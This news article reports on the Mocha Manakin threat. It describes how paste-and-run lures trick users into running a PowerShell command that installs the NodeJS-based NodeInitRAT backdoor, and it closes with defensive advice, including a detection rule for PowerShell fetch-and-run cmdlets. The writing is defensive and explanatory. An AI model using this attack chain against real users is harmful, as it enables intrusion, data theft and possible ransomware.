New Mocha Manakin Malware Deploys NodeInitRAT via Clickfix Attack

A new and concerning cyber threat, dubbed Mocha Manakin, has been identified by cybersecurity research firm Red Canary. First tracked in January 2025, this threat uniquely combines social engineering tricking people with specially built malicious software.

Mocha Manakin uses a deceptive tactic called paste and run (also known as Clickfix or fakeCAPTCHA). This method fools computer users into unknowingly copying and running harmful commands, often disguised as steps to fix access to a document or prove they are human.

These fake instructions bypass regular security checks, making it easy for the malicious script to download further harmful programs onto the victim’s computer. Since August 2024, Red Canary has seen a rise in paste-and-run attacks due to their effectiveness in tricking users.

NodeInitRAT: A Custom-Built Backdoor Leading to Ransomware?

According to the company’s technical blog post, what makes Mocha Manakin different is the custom-made malicious program it delivers: a NodeJS-based backdoor called NodeInitRAT. Once a user falls for the paste-and-run trick, a PowerShell command is executed to download a .zip file, which is then saved to the user’s temporary folder, typically C:UsersAppDataLocalTemp.

This .zip archive contains a legitimate node.exe program. The PowerShell then uses this node.exe to run the NodeInitRAT malicious code, passing it directly via the command line.

Once installed, NodeInitRAT can secretly gather sensitive network information, run any commands it’s given, and deploy more harmful software. This custom backdoor communicates with its controllers over the internet, often using legitimate Cloudflare tunnels to hide its activity.

As of May 2025, Red Canary has not directly seen Mocha Manakin lead to ransomware. However, based on its capabilities and links to Interlock ransomware activity observed by Sekoia.io, Red Canary believes with moderate confidence that unstopped Mocha Manakin infections could likely result in ransomware attacks. This connection is concerning, highlighting the serious potential for data encryption and financial demands.

How to Protect Against Mocha Manakin

Red Canary advises organizations to educate their staff about paste-and-run tactics, teaching them not to follow unexpected instructions that ask them to copy and paste commands into their system. Monitoring for unusual computer behaviours is also crucial. If NodeInitRAT is found, immediately stop active node.exe processes running the malware. The harmful code might also exist in hidden files (like those found in AppDataRoaming) or in Windows Registry entries, which should be deleted to prevent the malware from running again.

For network defence, blocking communication with known harmful domains used by NodeInitRAT can prevent it from connecting with its controllers. Technical teams can also set up detection rules to detect PowerShell commands that use invoke-expression and invoke-restmethod, which are typical signs of Mocha Manakin’s initial infection. By staying alert and implementing these protective measures, organizations can significantly reduce their risk from this growing threat.